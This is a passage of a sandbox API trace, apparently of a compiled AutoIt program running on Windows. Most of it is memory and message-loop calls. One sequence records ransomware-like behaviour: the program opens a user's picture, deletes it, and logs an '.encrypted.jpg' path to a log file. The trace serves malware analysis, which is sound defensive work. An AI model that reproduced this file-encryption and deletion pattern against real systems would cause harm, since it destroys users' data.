| out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.291] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0041.291] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.291] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.291] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.291] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0041.291] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.291] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.291] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.291] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.292] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0041.292] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.293] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\zsk4r.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0041.293] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.293] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.293] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0041.294] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.294] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0041.294] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.294] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.294] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.294] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.294] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.294] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.294] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.294] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.294] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0041.294] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.294] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0041.295] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.295] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.295] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.295] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0041.295] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.295] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg", lpFilePart=0x0) returned 0x35 [0041.295] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a30a60, ftCreationTime.dwHighDateTime=0x1d5b5d3, ftLastAccessTime.dwLowDateTime=0x937c360, ftLastAccessTime.dwHighDateTime=0x1d5b686, ftLastWriteTime.dwLowDateTime=0x1851dc20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14480, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="zSK4r.jpg", cAlternateFileName="")) returned 0x7c2240 [0041.295] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\zsk4r.jpg")) returned 1 [0041.297] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a30a60, ftCreationTime.dwHighDateTime=0x1d5b5d3, ftLastAccessTime.dwLowDateTime=0x937c360, ftLastAccessTime.dwHighDateTime=0x1d5b686, ftLastWriteTime.dwLowDateTime=0x1851dc20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x14480, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="zSK4r.jpg", cAlternateFileName="")) returned 0 [0041.297] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0041.297] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0041.297] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0041.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0041.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0041.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0041.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0041.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0041.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.297] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0041.297] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0041.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.297] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0041.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0041.298] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0041.298] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0041.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.298] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0041.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0041.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.298] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0041.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0041.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0041.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.298] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0041.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0041.298] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.298] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.298] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.298] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0041.299] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.299] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0041.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.299] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0041.299] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x30e8, lpOverlapped=0x0) returned 1 [0041.299] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.299] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x30e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.299] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0041.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0041.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.encrypted.jpg\r\n", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0041.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x42) returned 0x88e138 [0041.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.encrypted.jpg\r\n", cchWideChar=66, lpMultiByteStr=0x88e138, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.encrypted.jpg\r\n", lpUsedDefaultChar=0x0) returned 66 [0041.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.299] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0041.299] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0041.299] WriteFile (in: hFile=0x128, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x41, lpOverlapped=0x0) returned 1 [0041.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0041.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.300] CloseHandle (hObject=0x128) returned 1 [0041.300] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.301] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.304] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0041.304] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.304] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.305] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.305] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.305] HeapFree (in: hHeap=0x770000, 